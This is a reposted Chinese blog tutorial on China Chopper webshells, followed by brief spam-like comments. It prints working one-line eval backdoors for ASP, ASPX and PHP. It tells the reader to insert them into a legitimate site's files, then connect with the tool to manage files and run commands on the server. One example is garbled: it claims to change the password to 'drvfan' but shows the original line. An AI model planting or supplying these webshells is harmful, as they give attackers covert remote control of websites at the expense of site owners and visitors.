注：本文转载，仅用来个人学习。

菜刀是用来连一句话的，asp、aspx、php的一句话菜刀都可以连，只是这几种一句话语句不一样。
asp的一句话是：<%eval request(“pass”)%>
aspx的一句话是：<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是：<?php @eval($_POST['pass']);?>
这几个一句话的密码都是pass，也就是双引号或者单引号包含着的这部分，比如我想把asp的一句话的密码改成drvfan，那么改完之后就是这样的：
<%eval request(“pass”)%>
其他同理。
要想连一句话，你首先得把这个一句话插入到一个正常的网站文件中，asp的一句话插入到asp文件里，aspx的一句话插入到aspx文件里，php同理。
当然，你也可以把一句话单独写在一个文件里，比如你新建了一个asp.php文件，这个asp.php文件的全部内容就只有一个一句话，也是可以的。
插入了一句话木马，下面就是连接了。
在菜刀主界面，右击，选择“添加”，
在“地址”这里填上你插入一句话的文件的地址，后边的那个小框填的是你的一句话的密码，其他的可以不用填，
填完之后单击“添加”，就可以了。
添加完毕后，你的这个一句话的shell会显示到菜刀主界面里，鼠标右击它，选择“文件管理”，就可以看到网站上的文件了
所以,使用菜刀,一定要熟练运用一句话
asp的一句话是：<%eval request(“pass”)%>
aspx的一句话是：<%@ Page Language=”Jscript”%><%eval(Request.Item["pass"],”unsafe”);%>
php的一句话是：<?php @eval($_POST['pass']);?>
在菜刀工具里还有一个功能，是“虚拟终端”，也是在右键菜单里的，这个相当于webshell中的执行DOS命令的功能
如果你的shell有权执行DOS命令，那么直接输入命令回车就可以看到结果了

14.空气源  2013/4/7 14:53:31 回复
php的不懂呀！路过支持一下呗
13.健康使者  2012/12/20 9:53:56 回复
学习了
12.女装报告  2012/12/11 11:32:08 回复
这是要教我们啥呀？
11.智能电网  2012/12/6 11:23:01 回复
鸭梨山大，楼主这篇藐似没看懂
10.长安婚纱摄影  2012/11/30 12:35:06 回复
鸭梨，太有才了！
9.南阳金巴黎婚纱摄影  2012/11/24 21:52:10 回复
好，顶
8.奶茶  2012/11/22 16:21:13 回复
菜刀不但是用来切菜还可以做其他很多东西。。。
7.wordpress博客主机  2012/11/21 9:43:19 回复
学习了
6.霍致永博客  2012/11/20 15:44:43 回复
这个标题太震撼啦哈哈欢迎来访
5.快播电影  2012/11/20 10:59:24 回复
看不懂 PHP了，吐血了
4.李志红博客  2012/11/19 16:07:53 回复
不是很懂，只来看看。
3.男装  2012/11/19 15:34:39 回复
看了半天，因为不懂，所以还是没有看懂
2.比分直播  2012/11/16 16:40:27 回复
来学习了，谢谢分享
1.润初颜  2012/11/16 15:22:27 回复
php的不懂呀！路过支持一下

继续阅读：黑客  

原创文章请注明转载自光的传人博客本文地址：http://www.liu16.com/post/maicaidao.html，标题：一句话与中国菜刀的用法